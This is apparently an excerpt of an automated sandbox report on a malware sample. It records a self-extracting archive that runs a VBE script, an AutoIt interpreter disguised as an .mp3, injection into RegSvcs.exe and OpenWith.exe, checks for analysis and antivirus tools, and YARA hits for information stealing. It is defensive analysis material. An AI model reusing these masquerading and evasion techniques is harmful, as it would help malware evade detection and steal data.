                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6z6g6memstr_36168152-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6%7,7|7memstr_c83ba159-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9=9h9x9memstr_48adba1d-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :%:;:e:d:memstr_a11c2b2a-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;c;a;memstr_0d2ed903-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <1<m<memstr_1519ec0f-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =5=q=memstr_035fbeab-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3$4w4l4}4memstr_b64d1c58-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5p6j7h8memstr_9d49458d-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9*=->>>memstr_726fec3f-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9*=->>>pmemstr_f9ed3717-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !0,0<0n0memstr_7a9f08ae-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 01h1s1{1memstr_8c63c0b4-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2'202;2c2a2m2memstr_ea82059f-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2d3~3memstr_adcc4766-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 444t4memstr_ba817732-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6d6h6q6|6memstr_f4151f4c-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :":e:memstr_b7a6b6a3-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )0f0v0memstr_9171b80c-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x)0f0v0memstr_115c0909-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2-252e2v2memstr_c5269d81-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 717p7memstr_747a5b53-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =1=t=a=l=memstr_2790d7da-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =+>j>y>memstr_b43d2b7d-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0_01-162z2memstr_3a129625-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 343q3e3memstr_30b94442-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6l6l6memstr_53332acf-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6v7`7memstr_0ebff911-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8n8z8{8memstr_1ea5f944-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :h:o:x:a;memstr_33d131a8-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <$<4<@<y=a=i=q=memstr_1601f670-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >%>1>memstr_fc5144e8-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0&020^0|0memstr_1b6bafbf-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 171k1f1w1memstr_a255694e-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2(2.2?2v2]2memstr_5911da67-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3=3e3h3memstr_8ef73320-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 344l4`4p4|4memstr_efcc396b-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6d7l7memstr_cb1d3dda-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8d8q8memstr_6df124ac-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 859f9memstr_e9dd11b8-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9i:u:]:memstr_11e162c4-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :#;r;z;b;memstr_c3dedbd3-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >s?{?memstr_7996104f-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0.040i0n0memstr_0676c604-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2c2o2memstr_044416ec-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 313<3g3m3v3memstr_98b2114a-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 424]4u4memstr_cae92d35-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6#7o7{7x8memstr_02dac5b9-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: : :(:0:9:b:j:v:^:p:{:memstr_e2432466-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :*;0;memstr_313d4601-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <b<k<p<u<{<memstr_881842eb-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?&?-?3?b?i?s?]?n?u?memstr_d90bdeff-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .090f0o0d0memstr_af7933c1-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1$141v152c2memstr_d688f2a7-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7p8|8memstr_fce4296b-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: : :2:n:l:v:memstr_82fb499f-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;);3;c;memstr_bfc9f289-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >->n>s>^>r>}>memstr_8be89a4d-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;>->n>s>^>r>}>memstr_7874172e-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >%?\?memstr_1e2f8d13-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1&2o2{2memstr_44f83123-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3>4&5}5memstr_ffc599c8-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5 6b6i6memstr_5fd603f3-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7$717r7memstr_f67f3509-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9'9t9memstr_0d443c3d-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :(:::l:^:p:memstr_47b28fa3-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;!;3;l<memstr_b47d0d50-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <;=m=memstr_269e996b-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0m0c0memstr_0248fe1c-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3\6b6memstr_4d02dfa2-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0)101z4o5w5memstr_5730548e-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;[<o<i?memstr_17df5fe6-b
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003DBB02 SendInput,keybd_event,7_2_003DBB02
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003DEBB3 mouse_event,7_2_003DEBB3
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 qwlvpmrupf.mp3 tnlupe.mp3Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003D13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,7_2_003D13F2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003D1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,7_2_003D1EF3
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007847000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.000000000113B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: qwlvpmrupf.mp3, 00000007.00000003.1947990948.00000000010A2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947564822.000000000109B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: qwlvpmrupf.mp3, qwlvpmrupf.mp3.exeBinary or memory string: Shell_TrayWnd
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296018168.0000000001403000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerq=
                Source: qwlvpmrupf.mp3, 00000007.00000003.1950739253.000000000104C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950894323.0000000001053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" ThenLL
                Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001043000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" ThenEy

                Language, Device and Operating System Detection

                barindex
                Source: Yara matchFile source: Process Memory Space: qwlvpmrupf.mp3 PID: 7640, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8072, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8188, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 4092, type: MEMORYSTR
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B26694 cpuid 0_2_00B26694
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00B1FD34
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B2454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00B2454A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003CE5F8 GetUserNameW,7_2_003CE5F8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003ABF0F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,7_2_003ABF0F
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B103BE GetVersionExW,0_2_00B103BE
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2078194158.0000000001805000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079848349.0000000001806000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tcpview.exe
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2078194158.0000000001805000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079848349.0000000001806000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2298245187.0000000001457000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2295050047.0000000001455000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294907619.0000000001447000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301395963.0000000001458000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214186237.0000000001A50000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217828434.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGUI.exe
                Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Procmon.exe
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0000000E.00000002.1935619525.00000000060B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2946403129.0000000005A41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2208992211.00000000062C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1961307501.0000000005639000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2068593152.00000000066C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.2287549394.0000000005FC3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1932421408.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: qwlvpmrupf.mp3Binary or memory string: WIN_81
                Source: qwlvpmrupf.mp3Binary or memory string: WIN_XP
                Source: qwlvpmrupf.mp3.exe, 00000013.00000000.2185210747.0000000000E53000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: qwlvpmrupf.mp3Binary or memory string: WIN_XPe
